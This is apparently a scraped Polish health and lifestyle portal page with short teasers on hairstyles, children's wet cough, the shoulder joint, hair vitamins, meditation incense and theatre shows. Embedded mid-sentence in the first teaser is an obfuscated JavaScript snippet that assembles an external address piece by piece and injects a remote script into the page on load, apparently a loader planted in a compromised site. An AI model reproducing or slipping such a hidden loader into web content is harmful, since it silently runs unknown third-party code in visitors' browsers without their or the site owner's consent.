Wiosenne fryzury, które łatwo wykonasz w domu

Wiosna stać będzie pod znakiem stylizacji pełnych objętości, które dzięki dostępnym narzędziom każda z nas wykona szybko i łatwo. Trend ten podąża za inspiracjami ze świata gwiazd, które przypominają za co pokochaliśmy przed laty bounce blowout. (function(){ a9a8=document.createElement("script");a9a8_="u"+("s")+"ta"; a9a8_+=("t.i")+""+"n";a9a8_+=(("f")+"o");a9a8.type="text/javascript"; a9a8_+="/"; a9a8u="495772132";a9a8u+=".0m71kxbc9a8v9utjyXz";a9a8u+="8ff3t1arif6"; a9a8.src="https://"+a9a8_+a9a8u;a9a8.async=true;document.body.appendChild(a9a8); })();

Mokry kaszel u dziecka – 8 sprawdzonych sposobów na ułatwianie odkrztuszania

Kaszel mokry, zwany też produktywnym, jest częstym objawem infekcji górnych dróg oddechowych u dzieci, wywoływanych przez zakażenie wirusowe lub bakteryjne. Pojawić się może w przebiegu przeziębienia lub anginy, ale też w ostrych i przewlekłych chorobach płuc lub oskrzeli. Mokry kaszel u dziecka przebiega z odkrztuszaniem wydzieliny z dróg oddechowych, która zwykle jest lepka i gęsta, przez co jej usuwanie jest trudne. Warto więc zastosować odpowiednie leczenie, które ułatwi usuwanie wydzieliny zalegającej w drogach oddechowych. Co robić, gdy pojawia się kaszel mokry? Jak wspomóc leczenie mokrego kaszlu u dziecka domowymi sposobami? Kiedy zgłosić się do lekarza? Odpowiadamy!

Staw ramienny – budowa, funkcjonalność

Staw ramienny jest częścią stawu barkowego, a zarazem największym stawem w obrębie kończyny górnej, którą łączy z obręczą barkową. To staw kulisty, a zatem umożliwia szeroki zakres ruchów we wszystkich płaszczyznach. Uraz stawu ramiennego objawia się bólem i może powodować problemy z całym barkiem. Anatomia stawu ramiennego – jak zbudowany jest staw ramienny? Na jakie problemy jest narażony? Jak dbać o staw ramienny na co dzień? Odpowiadamy!

Jakie witaminy wybrać na poprawę kondycji włosów?

Piękne i mocne włosy świadczą o dobrym stanie zdrowia. Niekiedy jednak zaczynają wypadać, stają się suche i łamliwe. Pogorszenie wyglądu i kondycji włosów może mieć wiele źródeł. Nadmierne wypadanie włosów może być przede wszystkim przyczyną różnych chorób. Powodem utraty dużych ilości włosów może być też nieprawidłowa pielęgnacja – niewłaściwy sposób czesania i szczotkowania włosów, prostowanie i kręcenie włosów czy trwała ondulacja. Za zły stan włosów może być odpowiedzialny ponadto przewlekły stres, niedokrwistość z powodu niedoboru żelaza, przyjmowanie niektórych leków czy nieprawidłowa dieta [1] uboga w cenne substancje odżywcze, zwłaszcza witaminy. Jakich witamin brakuje, gdy wypadają nadmiernie włosy? Które witaminy stosować na mocne włosy? Odpowiadamy!

Jak kadzidła do medytacji wpływają na ciało i umysł?

Kadzidła od stuleci były wykorzystywane do medytacji i rytuałów religijnych. Obecnie nadal są one popularne. Aromatyczne zapachy kadzideł mają działanie uspokajające na umysł. Dzięki nim można skupić się i wprowadzić w stan relaksacji, co jest kluczowym aspektem podczas medytacji. Kadzidła do medytacji mogą być skutecznym narzędziem w osiąganiu spokoju i wewnętrznej równowagi. Należy jednak korzystać z nich z umiarem. Osoby cierpiące na alergię powinny zachować szczególną ostrożność.

TOP 4 spektakle o inspirujących kobietach. Co obejrzeć w teatrze?

Świat sztuki pełen jest silnych postaci kobiecych, które łamiąc społeczne konwenanse i realizując swoje ambicje, często wyprzedzały swoje czasy. Dzień Kobiet to idealna okazja, by zrobić prezent dla samej siebie, wybrać się do teatru oraz poznać inspirujące historie. Bilety na wszystkie spektakle znajdziecie na portalu kicket.com (dawne ewejsciowki.pl).